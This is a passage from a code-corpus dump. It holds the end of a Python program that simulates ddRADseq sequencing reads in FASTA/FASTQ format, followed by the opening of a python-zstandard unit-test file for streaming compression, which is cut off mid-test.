unambiguous restriction site sequences corresponding to each enzyme\n unambiguous_ressite1_seq_list = get_unambiguous_sequence_list(ressite1_seq.upper())\n unambiguous_ressite2_seq_list = get_unambiguous_sequence_list(ressite2_seq.upper())\n Message.print('trace', 'unambiguous_ressite1_seq_list: {0}'.format(unambiguous_ressite1_seq_list))\n Message.print('trace', 'unambiguous_ressite2_seq_list: {0}'.format(unambiguous_ressite2_seq_list))\n\n # get the restriction overhang sequences\n if len(ressite1_lcut_seq) >= len(ressite1_rcut_seq):\n resoverhang1_seq = get_reverse_complementary_sequence(ressite1_lcut_seq)\n else:\n resoverhang1_seq = ressite1_rcut_seq\n if len(ressite2_lcut_seq) >= len(ressite2_rcut_seq):\n resoverhang2_seq = ressite2_lcut_seq\n else:\n resoverhang2_seq = get_reverse_complementary_sequence(ressite2_rcut_seq)\n Message.print('trace', 'resoverhang1_seq: {0} - resoverhang2_seq: {1}'.format(resoverhang1_seq, resoverhang2_seq))\n\n # get the length of the restriction overhangs\n resoverhang1_len = len(resoverhang1_seq)\n resoverhang2_len = len(resoverhang2_seq)\n Message.print('trace', 'resoverhang1_len: {0} - resoverhang2_len: {1}'.format(resoverhang1_len, resoverhang2_len))\n\n # get the list of unambiguous restriction overhang sequences corresponding to each enzyme\n unambiguous_resoverhang1_seq_list = get_unambiguous_sequence_list(resoverhang1_seq.upper())\n unambiguous_resoverhang2_seq_list = get_unambiguous_sequence_list(resoverhang2_seq.upper())\n Message.print('trace', 'unambiguous_resoverhang1_seq_list: {0}'.format(unambiguous_resoverhang1_seq_list))\n Message.print('trace', 'unambiguous_resoverhang2_seq_list: {0}'.format(unambiguous_resoverhang2_seq_list))\n\n # get the end sequences and the DBR strand\n (wend_seq, cend_seq, dbr_strand) = get_ends(endsfile, wend, cend, technique, index1len, index1_symbol, index2len, index2_symbol, dbrlen, dbr_symbol)\n Message.print('trace', 'wend_seq: {0}'.format(wend_seq))\n Message.print('trace', 'cend_seq: {0}'.format(cend_seq))\n Message.print('trace', 'dbr_strand: {0}'.format(dbr_strand))\n\n # get the individuals dictionary\n individuals_dict = get_individuals(individualsfile, technique)\n individuals_num = len(individuals_dict)\n Message.print('trace', 'Individuals num: {0}'.format(individuals_num))\n Message.print('trace', 'individuals_dict: 
{0}'.format(individuals_dict))\n\n # get the individuals keys list\n individual_keys_list = get_individual_keys(individuals_dict)\n\n # get the GC distribution list\n GC_distribution_file = os.path.splitext(fragsfile)[0] + '-GC-distribution.csv'\n GC_distribution_list = get_GC_distribution(GC_distribution_file)\n\n # get the fragments list\n fragments_list = get_fragments_list(fragsfile)\n\n # open the output file(s)\n extension = '.fasta' if format == 'FASTA' else '.fastq'\n if readtype == 'SE':\n readsfile1 = readsfile + extension\n elif readtype == 'PE':\n readsfile1 = readsfile + '-1' + extension\n readsfile2 = readsfile + '-2' + extension\n try:\n readsfile1_id = open(readsfile1, mode='w', encoding='iso-8859-1')\n except:\n raise ProgramError('F002', readsfile1)\n if readtype == 'PE':\n try:\n readsfile2_id = open(readsfile2, mode='w', encoding='iso-8859-1')\n except:\n raise ProgramError('F002', readsfile2)\n\n # initialize the count of loci\n loci_count = 0\n\n # initialize the count of total reads\n total_reads_count = 0\n\n # process each fragment in fragments_list\n for data_fragment in fragments_list:\n\n # assign fragment data\n fragment_num = data_fragment[0]\n GC_rate = data_fragment[1]\n fragment_seq = data_fragment[2]\n order = data_fragment[3]\n Message.print('trace', 'order: {0} - fragment_num: {1}'.format(order, fragment_num))\n\n # verify the restriction overhang sequences of the locus fragment\n if fragment_seq[:resoverhang1_len].upper() not in unambiguous_resoverhang1_seq_list:\n raise ProgramError('D304', enzyme1, \"5'\", fragment_num)\n if fragment_seq[(len(fragment_seq) - resoverhang2_len):].upper() not in unambiguous_resoverhang2_seq_list:\n raise ProgramError('D304', enzyme2, \"3'\", fragment_num)\n\n # get the unambiguous sequences corresponding to each restriction site\n unambiguous_resoverhang1_seq = fragment_seq[:resoverhang1_len]\n unambiguous_resoverhang2_seq = fragment_seq[(len(fragment_seq) - resoverhang2_len):]\n Message.print('trace', 'unambiguous_resoverhang1_seq: {0} - unambiguous_resoverhang2_seq: {1}'.format(unambiguous_resoverhang1_seq, unambiguous_resoverhang2_seq))\n\n # get the sequence of the locus fragment\n fragment_seq = fragment_seq[resoverhang1_len:(len(fragment_seq) - resoverhang2_len)]\n Message.print('trace', 'fragment_seq: {0}'.format(fragment_seq))\n\n # check that the fragment sequence length is greater than or equal to insertlen\n if len(fragment_seq) < insertlen:\n continue\n\n # add 1 to the count of loci\n loci_count += 1\n\n # determine if there are PCR duplicates\n pcrdup = arethere_pcrdup(pcrdupprob, GC_rate, GC_distribution_list, gcfactor)\n\n # if there are mutations, get the mutation number and a list with mutated sequences of the locus fragment\n if mutprob > 0:\n\n # assign the maximum mutated sequences number (usually 1)\n max_mutated_seq_num = 1 # always 1 in this version\n\n # get the mutations number (between 1 and the maximum mutated sequences number)\n mutated_seq_num = random.randrange(1, max_mutated_seq_num + 1)\n Message.print('trace', 'The fragment of locus {0} has {1} mutated sequence(s).'.format(loci_count, mutated_seq_num))\n\n # initialize the fragment sequences list\n mutated_seqs_list = []\n\n # append mutated sequences\n for i in range(mutated_seq_num):\n # -- mutated_seq = mutate_sequence(fragment_seq, indelprob, maxindelsize, locusmaxmut, (resoverhang1_len + len(fragment_seq) + resoverhang2_len), unambiguous_ressite1_seq_list, unambiguous_ressite2_seq_list)\n mutated_seq = mutate_sequence(fragment_seq, indelprob, 
maxindelsize, locusmaxmut, (insertlen - resoverhang1_len - resoverhang2_len), unambiguous_ressite1_seq_list, unambiguous_ressite2_seq_list)\n mutated_seqs_list.append(mutated_seq)\n Message.print('trace', ' Original sequence : {0}'.format(fragment_seq))\n Message.print('trace', ' Mutated sequence {0} : {1}'.format(i, mutated_seqs_list[i]))\n Message.print('trace', ' _123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789')\n\n # assign data of both alleles\n for individual_key in individual_keys_list:\n if individuals_dict[individual_key]['replicated_individual_id'].upper() == 'NONE':\n\n # allele 1\n if mutprob > random.random():\n random_num = random.randrange(0, max_mutated_seq_num)\n individuals_dict[individual_key]['allele1_seq'] = mutated_seqs_list[random_num]\n individuals_dict[individual_key]['allele1_ismutated'] = True\n individuals_dict[individual_key]['allele1_probability'] = random.uniform(0.25, 0.75)\n else:\n individuals_dict[individual_key]['allele1_seq'] = fragment_seq\n individuals_dict[individual_key]['allele1_ismutated'] = False\n individuals_dict[individual_key]['allele1_probability'] = random.uniform(0.25, 0.75)\n if dropout > random.random():\n individuals_dict[individual_key]['allele1_isthere_dropout'] = True\n else:\n individuals_dict[individual_key]['allele1_isthere_dropout'] = False\n\n # allele 2\n if mutprob > random.random():\n random_num = random.randrange(0, max_mutated_seq_num)\n individuals_dict[individual_key]['allele2_seq'] = mutated_seqs_list[random_num]\n individuals_dict[individual_key]['allele2_ismutated'] = True\n else:\n individuals_dict[individual_key]['allele2_seq'] = fragment_seq\n individuals_dict[individual_key]['allele2_ismutated'] = False\n if dropout > random.random():\n individuals_dict[individual_key]['allele2_isthere_dropout'] = True\n else:\n individuals_dict[individual_key]['allele2_isthere_dropout'] = False\n\n # assign the sequences of replicated individuals\n for individual_key in individual_keys_list:\n replicated_individual_id = individuals_dict[individual_key]['replicated_individual_id']\n if replicated_individual_id.upper() != 'NONE':\n for individual_key2, individual_data2 in individuals_dict.items():\n if individual_data2['individual_id'] == replicated_individual_id:\n individuals_dict[individual_key]['allele1_seq'] = individuals_dict[individual_key2]['allele1_seq']\n individuals_dict[individual_key]['allele1_ismutated'] = individuals_dict[individual_key2]['allele1_ismutated']\n individuals_dict[individual_key]['allele1_probability'] = individuals_dict[individual_key2]['allele1_probability']\n individuals_dict[individual_key]['allele1_isthere_dropout'] = individuals_dict[individual_key2]['allele1_isthere_dropout']\n individuals_dict[individual_key]['allele2_seq'] = individuals_dict[individual_key2]['allele2_seq']\n individuals_dict[individual_key]['allele2_ismutated'] = individuals_dict[individual_key2]['allele2_ismutated']\n individuals_dict[individual_key]['allele2_isthere_dropout'] = individuals_dict[individual_key2]['allele2_isthere_dropout']\n break\n\n # there are not mutations\n else:\n\n # assign the locus sequence to both alleles\n for individual_key in individual_keys_list:\n individuals_dict[individual_key]['allele1_seq'] = fragment_seq\n 
individuals_dict[individual_key]['allele1_ismutated'] = False\n individuals_dict[individual_key]['allele1_isthere_dropout'] = False\n individuals_dict[individual_key]['allele1_probability'] = 1\n individuals_dict[individual_key]['allele2_seq'] = fragment_seq\n individuals_dict[individual_key]['allele2_ismutated'] = False\n individuals_dict[individual_key]['allele2_isthere_dropout'] = False\n\n # calculate reads number of this locus\n locus_reads_num = calculate_locus_reads_number(readsnum, minreadvar, maxreadvar, locinum)\n\n # initialize the locus reads count\n locus_reads_count = 0\n\n #for locus_reads_count in range(1, locus_reads_num + 1):\n while (True):\n\n # get the indivual key of this read\n while True:\n individual_key = individual_keys_list[random.randrange(0, individuals_num)]\n random_number = random.random()\n if individuals_dict[individual_key]['allele1_probability'] > random_number:\n if not individuals_dict[individual_key]['allele1_isthere_dropout']:\n allele = 1\n break\n else:\n if not individuals_dict[individual_key]['allele2_isthere_dropout']:\n allele = 2\n break\n\n # get data of the individual\n individual_id = individuals_dict[individual_key]['individual_id']\n individual_index1_seq = individuals_dict[individual_key]['index1_seq']\n individual_index2_seq = individuals_dict[individual_key]['index2_seq']\n individual_allele1_probability = individuals_dict[individual_key]['allele1_probability']\n if allele == 1:\n individual_allele_seq = individuals_dict[individual_key]['allele1_seq']\n individual_allele_ismutated = individuals_dict[individual_key]['allele1_ismutated']\n Message.print('trace', ' Individual: {0:11} - Prob. allele 1: {1:5f} - Random number: {2:5f} - 1er allele - is mutated?: {3:5} - seq: {4}'.format(individual_id, individual_allele1_probability, random_number, 'True' if individual_allele_ismutated else 'False', individual_allele_seq))\n else:\n individual_allele_seq = individuals_dict[individual_key]['allele2_seq']\n individual_allele_ismutated = individuals_dict[individual_key]['allele2_ismutated']\n Message.print('trace', ' Individual: {0:11} - Prob. 
allele 2: {1:5f} - Random number: {2:5f} - 2nd allele - is mutated?: {3:5} - seq: {4}'.format(individual_id, (1 - individual_allele1_probability), random_number, 'True' if individual_allele_ismutated else 'False', individual_allele_seq))\n\n # attach the index1 in the 5' end sequence of the Watson strand\n merged_wend_seq = merge_sequence(wend_seq, index1_symbol * index1len, individual_index1_seq)\n\n # attach the index2 in the 5' end sequence of the Crick strand\n if technique in ['IND1', 'IND1_DBR']:\n merged_cend_seq = cend_seq\n elif technique in ['IND1_IND2', 'IND1_IND2_DBR']:\n merged_cend_seq = merge_sequence(cend_seq, index2_symbol * index2len, individual_index2_seq)\n\n # get the degenerate nucleotides to identify the PCR duplicates and attach them to the corresponding end sequence\n if technique in ['IND1', 'IND1_IND2']:\n pass\n elif technique in ['IND1_DBR', 'IND1_IND2_DBR']:\n dbr_seq = generate_sequence(dbrlen).lower()\n if dbr_strand == 'WEND':\n merged_wend_seq = merge_sequence(merged_wend_seq, dbr_symbol * dbrlen, dbr_seq)\n elif dbr_strand == 'CEND':\n merged_cend_seq = merge_sequence(merged_cend_seq, dbr_symbol * dbrlen, dbr_seq)\n\n # build the complete read sequence of the Watson strand\n watson_strand_seq = merged_wend_seq + unambiguous_resoverhang1_seq + individual_allele_seq[:insertlen - resoverhang1_len:]\n Message.print('trace', 'watson_strand_seq: {0}'.format(watson_strand_seq))\n\n # if readtype is PE, build the complete read sequence of the Crick strand\n if readtype == 'PE':\n crick_strand_seq = merged_cend_seq + get_reverse_complementary_sequence(unambiguous_resoverhang2_seq) + get_reverse_complementary_sequence(individual_allele_seq)[:insertlen - resoverhang2_len]\n Message.print('trace', 'crick_strand_seq: {0}'.format(crick_strand_seq))\n\n # get the PCR duplicates number\n pcrdup_num = calculate_pcrdup_num(pcrdup, pcrdistribution, multiparam, poissonparam)\n\n # write the records and their possible PCR duplicates\n for i in range(pcrdup_num + 1):\n\n # add 1 to the count of total reads\n total_reads_count += 1\n\n # add 1 to the locus reads count\n locus_reads_count += 1\n\n # write the record of the Watson strand sequence and its possible PCR duplicate records in the first output file\n if format == 'FASTA':\n readsfile1_id.write('>read: {0} | locus: {1} | read in locus: {2} | fragment: {3} | mutated: {4} | individual: {5} | index1: {6} | index2: {7}\\n'.format(total_reads_count, loci_count, locus_reads_count, fragment_num, individual_allele_ismutated, individual_id, individual_index1_seq, individual_index2_seq))\n readsfile1_id.write('{0}\\n'.format(watson_strand_seq))\n elif format == 'FASTQ':\n readsfile1_id.write('@read: {0} | locus: {1} | read in locus: {2} | fragment: {3} | mutated: {4} | individual: {5} | index1: {6} | index2: {7}\\n'.format(total_reads_count, loci_count, locus_reads_count, fragment_num, individual_allele_ismutated, individual_id, individual_index1_seq, individual_index2_seq))\n readsfile1_id.write('{0}\\n'.format(watson_strand_seq))\n readsfile1_id.write('+\\n')\n quality = generate_quality(len(watson_strand_seq))\n readsfile1_id.write('{0}\\n'.format(quality))\n\n # if readtype is PE, write the record with the reverse complementary sequence in the second output file\n if readtype == 'PE':\n\n # write the record of the Crick strand sequence and its possible PCR duplicate records in the second output file\n if format == 'FASTA':\n readsfile2_id.write('>read: {0} | locus: {1} | read in locus: {2} | fragment: {3} | mutated: {4} | individual: 
{5} | index1: {6} | index2: {7}\\n'.format(total_reads_count, loci_count, locus_reads_count, fragment_num, individual_allele_ismutated, individual_id, individual_index1_seq, individual_index2_seq))\n readsfile2_id.write('{0}\\n'.format(crick_strand_seq))\n elif format == 'FASTQ':\n readsfile2_id.write('@read: {0} | locus: {1} | read in locus: {2} | fragment: {3} | mutated: {4} | individual: {5} | index1: {6} | index2: {7}\\n'.format(total_reads_count, loci_count, locus_reads_count, fragment_num, individual_allele_ismutated, individual_id, individual_index1_seq, individual_index2_seq))\n readsfile2_id.write('{0}\\n'.format(crick_strand_seq))\n readsfile2_id.write('+\\n')\n quality = generate_quality(len(crick_strand_seq))\n readsfile2_id.write('{0}\\n'.format(quality))\n\n # notify the reads have been written\n Message.print('verbose', '\\rSimulated sequences reads written: {0:9d}'.format(total_reads_count))\n\n # exit of for i when the readsnum has been achieved\n if total_reads_count >= readsnum:\n break\n\n # exit of for i when the reads number of this locus has been achieved\n if locus_reads_count >= locus_reads_num:\n break\n\n # exit of while True when the readsnum has been achieved\n if total_reads_count >= readsnum:\n break\n\n # exit of while True when the reads number of this locus has been achieved\n if locus_reads_count >= locus_reads_num:\n break\n\n # exit of for data_fragments when the readsnum has been achieved\n if total_reads_count >= readsnum:\n break\n\n # close reads files\n readsfile1_id.close()\n if readtype == 'PE':\n readsfile2_id.close()\n\n # show OK message \n Message.print('verbose', '\\n')\n if readtype == 'SE':\n Message.print('info', 'The file {0} containing the simulated sequences is created.'.format(get_file_name(readsfile1)))\n elif readtype == 'PE':\n Message.print('info', 'The files {0} and {1} containing the simulated sequences are created.'.format(get_file_name(readsfile1), get_file_name(readsfile2)))\n\n#-------------------------------------------------------------------------------\n\ndef build_options():\n '''Build a dictionary with the program options.'''\n\n # get all options dictionary\n all_options_dict = get_all_options_dict()\n\n # define the options dictionary\n options_dict = {\n 'fragsfile': all_options_dict['fragsfile'],\n 'technique': all_options_dict['technique'],\n 'format': all_options_dict['format'],\n 'readsfile': all_options_dict['readsfile'],\n 'readtype': all_options_dict['readtype'],\n 'rsfile': all_options_dict['rsfile'],\n 'enzyme1': all_options_dict['enzyme1'],\n 'enzyme2': all_options_dict['enzyme2'],\n 'endsfile': all_options_dict['endsfile'],\n 'index1len': all_options_dict['index1len'],\n 'index2len': all_options_dict['index2len'],\n 'dbrlen': all_options_dict['dbrlen'],\n 'wend': all_options_dict['wend'],\n 'cend': all_options_dict['cend'],\n 'individualsfile': all_options_dict['individualsfile'],\n 'locinum': all_options_dict['locinum'],\n 'readsnum': all_options_dict['readsnum'],\n 'minreadvar': all_options_dict['minreadvar'],\n 'maxreadvar': all_options_dict['maxreadvar'],\n 'insertlen': all_options_dict['insertlen'],\n 'mutprob': all_options_dict['mutprob'],\n 'locusmaxmut': all_options_dict['locusmaxmut'],\n 'indelprob': all_options_dict['indelprob'],\n 'maxindelsize': all_options_dict['maxindelsize'],\n 'dropout': all_options_dict['dropout'],\n 'pcrdupprob': all_options_dict['pcrdupprob'],\n 'pcrdistribution': all_options_dict['pcrdistribution'],\n 'multiparam': all_options_dict['multiparam'],\n 'poissonparam': 
all_options_dict['poissonparam'],\n 'gcfactor': all_options_dict['gcfactor'],\n 'verbose': all_options_dict['verbose'],\n 'trace': all_options_dict['trace']\n }\n\n # return the options dictionary\n return options_dict\n\n#-------------------------------------------------------------------------------\n\ndef print_help(options_dict):\n '''Print the program help.'''\n\n # get general data\n project_name = get_project_name()\n project_version = get_project_version()\n program_file = get_file_name(__file__)\n config_file = get_config_file(__file__)\n\n # print the help\n Message.print('info', '')\n Message.print('info', '{0} version {1}'.format(project_name, project_version))\n Message.print('info', '')\n Message.print('info', '{0} builds a file in FASTA/FASTQ format with simulated reads of a double digest RADseq.'.format(program_file))\n Message.print('info', '')\n Message.print('info', 'Usage: {0} --help'.format(program_file))\n Message.print('info', '')\n Message.print('info', ' Show the help of {0}.'.format(program_file))\n Message.print('info', '')\n Message.print('info', ' or: {0} --config'.format(program_file))\n Message.print('info', '')\n Message.print('info', ' Create the config file {0} with the default value of the options.'.format(config_file))\n Message.print('info', ' The default value of the options can be modified.'.format(config_file))\n Message.print('info', '')\n Message.print('info', ' or: {0} [--option= [--option=, ...]]'.format(program_file))\n Message.print('info', '')\n Message.print('info', ' The options values are read from the config file {0}, but they can be modified'.format(config_file))\n Message.print('info', ' in command line. The options are:')\n Message.print('info', '')\n Message.print('info', ' {0:18} {1}'.format('option', 'value'))\n Message.print('info', ' {0:18} {1}'.format('=' * 14, '=' * 78))\n Message.print('info', ' {0:18} {1}'.format('--fragsfile', options_dict['fragsfile']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--technique', options_dict['technique']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--format', options_dict['format']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--readsfile', options_dict['readsfile']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--readtype', options_dict['readtype']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--rsfile', options_dict['rsfile']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--enzyme1', options_dict['enzyme1']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--enzyme2', options_dict['enzyme2']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--endsfile', options_dict['endsfile']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--index1len', options_dict['index1len']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--index2len', options_dict['index2len']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--dbrlen', options_dict['dbrlen']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--wend', options_dict['wend']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--cend', options_dict['cend']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--individualsfile', options_dict['individualsfile']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--locinum', options_dict['locinum']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--readsnum', options_dict['readsnum']['comment']))\n Message.print('info', ' {0:18} 
{1}'.format('--minreadvar', options_dict['minreadvar']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--maxreadvar', options_dict['maxreadvar']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--insertlen', options_dict['insertlen']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--mutprob', options_dict['mutprob']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--locusmaxmut', options_dict['locusmaxmut']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--indelprob', options_dict['indelprob']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--maxindelsize', options_dict['maxindelsize']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--dropout', options_dict['dropout']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--pcrdupprob', options_dict['pcrdupprob']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--pcrdistribution', options_dict['pcrdistribution']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--multiparam', options_dict['multiparam']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--poissonparam', options_dict['poissonparam']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--gcfactor', options_dict['gcfactor']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--verbose', options_dict['verbose']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--trace', options_dict['trace']['comment']))\n\n#-------------------------------------------------------------------------------\n\ndef build_config(options_dict):\n '''Build the file with the options by default.'''\n\n # get the config file\n config_file = get_config_file(__file__)\n\n # create the config file and write the default options\n try:\n with open(config_file, mode='w', encoding='iso-8859-1') as config_file_id:\n config_file_id.write('{0:43} # {1}\\n'.format('fragsfile' + '=' + options_dict['fragsfile']['default'], options_dict['fragsfile']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('technique' + '=' + options_dict['technique']['default'], options_dict['technique']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('format' + '=' + options_dict['format']['default'], options_dict['format']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('readsfile' + '=' + options_dict['readsfile']['default'], options_dict['readsfile']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('readtype' + '=' + options_dict['readtype']['default'], options_dict['readtype']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('rsfile' + '=' + options_dict['rsfile']['default'], options_dict['rsfile']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('enzyme1' + '=' + options_dict['enzyme1']['default'], options_dict['enzyme1']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('enzyme2' + '=' + options_dict['enzyme2']['default'], options_dict['enzyme2']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('endsfile' + '=' + options_dict['endsfile']['default'], options_dict['endsfile']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('index1len' + '=' + options_dict['index1len']['default'], options_dict['index1len']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('index2len' + '=' + options_dict['index2len']['default'], options_dict['index2len']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('dbrlen' + '=' + options_dict['dbrlen']['default'], options_dict['dbrlen']['comment']))\n 
config_file_id.write('{0:43} # {1}\\n'.format('wend' + '=' + options_dict['wend']['default'], options_dict['wend']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('cend' + '=' + options_dict['cend']['default'], options_dict['cend']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('individualsfile' + '=' + options_dict['individualsfile']['default'], options_dict['individualsfile']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('locinum' + '=' + options_dict['locinum']['default'], options_dict['locinum']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('readsnum' + '=' + options_dict['readsnum']['default'], options_dict['readsnum']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('minreadvar' + '=' + options_dict['minreadvar']['default'], options_dict['minreadvar']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('maxreadvar' + '=' + options_dict['maxreadvar']['default'], options_dict['maxreadvar']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('insertlen' + '=' + options_dict['insertlen']['default'], options_dict['insertlen']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('mutprob' + '=' + options_dict['mutprob']['default'], options_dict['mutprob']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('locusmaxmut' + '=' + options_dict['locusmaxmut']['default'], options_dict['locusmaxmut']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('indelprob' + '=' + options_dict['indelprob']['default'], options_dict['indelprob']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('maxindelsize' + '=' + options_dict['maxindelsize']['default'], options_dict['maxindelsize']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('dropout' + '=' + options_dict['dropout']['default'], options_dict['dropout']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('pcrdupprob' + '=' + options_dict['pcrdupprob']['default'], options_dict['pcrdupprob']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('pcrdistribution' + '=' + options_dict['pcrdistribution']['default'], options_dict['pcrdistribution']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('multiparam' + '=' + options_dict['multiparam']['default'], options_dict['multiparam']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('poissonparam' + '=' + options_dict['poissonparam']['default'], options_dict['poissonparam']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('gcfactor' + '=' + options_dict['gcfactor']['default'], options_dict['gcfactor']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('verbose' + '=' + options_dict['verbose']['default'], options_dict['verbose']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('trace' + '=' + options_dict['trace']['default'], options_dict['trace']['comment']))\n except:\n raise ProgramError('F001', config_file)\n\n # show OK message \n Message.print('info', 'The configuration file {0} is created.'.format(get_file_name(config_file)))\n\n#-------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n sys.exit(0)\n\n#-------------------------------------------------------------------------------\n","repo_name":"GGFHF/ddRADseqTools","sub_path":"Package/simddradseq.py","file_name":"simddradseq.py","file_ext":"py","file_size_in_byte":38050,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"27"} 
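A note on the read assembly in the simddradseq.py record above: each Watson-strand read is built as the 5' end sequence, then the unambiguous restriction overhang, then a prefix of the allele, so every read carries exactly insertlen template bases after the adapter. A minimal standalone sketch of that slicing, with invented stand-in sequences (none of these values come from the package):

wend = "ACACTCTTTCCCTACACGACG"   # stand-in 5' end sequence (assumption)
overhang = "CG"                  # stand-in restriction overhang (assumption)
allele = "ATTGCCGA" * 20         # stand-in allele sequence (assumption)
insertlen = 75

# mirrors watson_strand_seq = merged_wend_seq + unambiguous_resoverhang1_seq
#         + individual_allele_seq[:insertlen - resoverhang1_len]
read = wend + overhang + allele[:insertlen - len(overhang)]
assert len(read) == len(wend) + insertlen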
+{"seq_id":"71273694151","text":"import io\nimport unittest\n\nimport zstandard as zstd\n\nfrom .common import (\n CustomBytesIO,\n)\n\n\nclass TestCompressor_read_to_iter(unittest.TestCase):\n def test_type_validation(self):\n cctx = zstd.ZstdCompressor()\n\n # Object with read() works.\n for chunk in cctx.read_to_iter(io.BytesIO()):\n pass\n\n # Buffer protocol works.\n for chunk in cctx.read_to_iter(b\"foobar\"):\n pass\n\n with self.assertRaisesRegex(\n ValueError, \"must pass an object with a read\"\n ):\n for chunk in cctx.read_to_iter(True):\n pass\n\n def test_read_empty(self):\n cctx = zstd.ZstdCompressor(level=1, write_content_size=False)\n\n source = io.BytesIO()\n it = cctx.read_to_iter(source)\n chunks = list(it)\n self.assertEqual(len(chunks), 1)\n compressed = b\"\".join(chunks)\n self.assertEqual(compressed, b\"\\x28\\xb5\\x2f\\xfd\\x00\\x00\\x01\\x00\\x00\")\n\n # And again with the buffer protocol.\n it = cctx.read_to_iter(b\"\")\n chunks = list(it)\n self.assertEqual(len(chunks), 1)\n compressed2 = b\"\".join(chunks)\n self.assertEqual(compressed2, compressed)\n\n def test_read_large(self):\n cctx = zstd.ZstdCompressor(level=1, write_content_size=False)\n\n source = io.BytesIO()\n source.write(b\"f\" * zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE)\n source.write(b\"o\")\n source.seek(0)\n\n # Creating an iterator should not perform any compression until\n # first read.\n it = cctx.read_to_iter(source, size=len(source.getvalue()))\n self.assertEqual(source.tell(), 0)\n\n # We should have exactly 2 output chunks.\n chunks = []\n chunk = next(it)\n self.assertIsNotNone(chunk)\n self.assertEqual(source.tell(), zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE)\n chunks.append(chunk)\n chunk = next(it)\n self.assertIsNotNone(chunk)\n chunks.append(chunk)\n\n self.assertEqual(source.tell(), len(source.getvalue()))\n\n with self.assertRaises(StopIteration):\n next(it)\n\n # And again for good measure.\n with self.assertRaises(StopIteration):\n next(it)\n\n # We should get the same output as the one-shot compression mechanism.\n self.assertEqual(b\"\".join(chunks), cctx.compress(source.getvalue()))\n\n params = zstd.get_frame_parameters(b\"\".join(chunks))\n self.assertEqual(params.content_size, zstd.CONTENTSIZE_UNKNOWN)\n self.assertEqual(params.window_size, 262144)\n self.assertEqual(params.dict_id, 0)\n self.assertFalse(params.has_checksum)\n\n # Now check the buffer protocol.\n it = cctx.read_to_iter(source.getvalue())\n chunks = list(it)\n self.assertEqual(len(chunks), 2)\n\n params = zstd.get_frame_parameters(b\"\".join(chunks))\n self.assertEqual(params.content_size, zstd.CONTENTSIZE_UNKNOWN)\n # self.assertEqual(params.window_size, 262144)\n self.assertEqual(params.dict_id, 0)\n self.assertFalse(params.has_checksum)\n\n self.assertEqual(b\"\".join(chunks), cctx.compress(source.getvalue()))\n\n def test_read_write_size(self):\n source = CustomBytesIO(b\"foobarfoobar\")\n cctx = zstd.ZstdCompressor(level=3)\n for chunk in cctx.read_to_iter(source, read_size=1, write_size=1):\n self.assertEqual(len(chunk), 1)\n\n self.assertEqual(source._read_count, len(source.getvalue()) + 1)\n\n def test_multithreaded(self):\n source = io.BytesIO()\n source.write(b\"a\" * 1048576)\n source.write(b\"b\" * 1048576)\n source.write(b\"c\" * 1048576)\n source.seek(0)\n\n cctx = zstd.ZstdCompressor(threads=2)\n\n compressed = 